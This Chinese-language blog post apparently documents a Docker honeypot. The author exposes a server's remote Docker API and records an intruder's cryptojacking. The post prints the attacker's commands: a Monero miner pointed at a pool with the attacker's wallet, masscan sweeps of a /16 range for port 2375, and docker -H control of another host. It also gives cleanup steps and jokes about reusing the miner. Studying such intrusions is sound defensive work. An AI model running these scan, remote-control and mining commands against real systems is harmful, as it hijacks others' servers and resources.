引导黑客来干服务器，我康康开放docker远程 黑客都干了些啥

#环境

云服务器开放所有端口

docker开放远程

 

#稍等几小时，黑客就上门啦O(∩_∩)O，扫描端口和下载镜像要一段时间，容器打包出来有500GB大。

#黑客创建的ubuntu容器

#开始啦，CPU占用99.9%

#https的地址是矿场地址，端口2375地址应该是黑客控制的docker主机，位置都在印度尼西亚

#查看详细进程，是docker容器里运行的docker,在挖这个矿池https://minexmr.com

#黑客的账户：

85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN

 

#命令粘出来大伙看下有没可以借鉴的

docker-cache -B --donate-level 1 -o pool.minexmr.com:443 -u 85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN
sh -c masscan 116.189.0.0/16 -p 2375 -oL - --max-rate 360 2>/dev/null
masscan 116.189.0.0/16 -p 2375 -oL - --max-rate 360
sh -c timeout 60 docker -H 43.241.51.111 ps -a --no-trunc
timeout 60 docker -H 43.241.51.111 ps -a --no-trunc
docker -H 43.241.51.111 ps -a --no-trunc

#看看日志信息

 

#再进黑客docker里运行的什么，看不了？没装docker

#OK那我再装上 docker   康康有啥镜像

apt-get remove docker docker-engine docker-ce docker.io

echo " deb https://download.docker.com/linux/ubuntu bionic main restricted "  >>  /etc/vim sources.list

apt-get install docker-ce -y

#噢太慢，好吧把它干掉。。。。。先

docker  stop  容器名

docker  ps -a 看下几个ubuntu镜像删掉

docker rm  容器名

docker update --restart=   #黑客这里设置了开机自动运行容器，要注意检查

 

#最后

#开放docker远程，就相当于把服务器资源共享出来，黑客通过远程docker可以做很多事，注意安全

docker  -H  地址  run  -d  nginx 

 

#拿到黑客镜像，我康康能不能改改挖矿走起O(∩_∩)O